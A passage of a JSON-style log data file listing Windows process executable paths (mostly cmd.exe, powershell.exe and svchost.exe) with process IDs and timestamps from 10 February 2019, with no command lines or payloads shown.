00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1d3c|2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x594|2019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17e0|2019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x23d8|2019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1480|2019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x13e0|2019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe|0x634|2019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x12e0|2019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe00|2019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1f60|2019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe08|2019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1b50|2019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xfc8|2019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xadc|2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xeb0|2019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x107c|2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ef4|2019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a5c|2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe|0xc5c|2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xd44|2019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 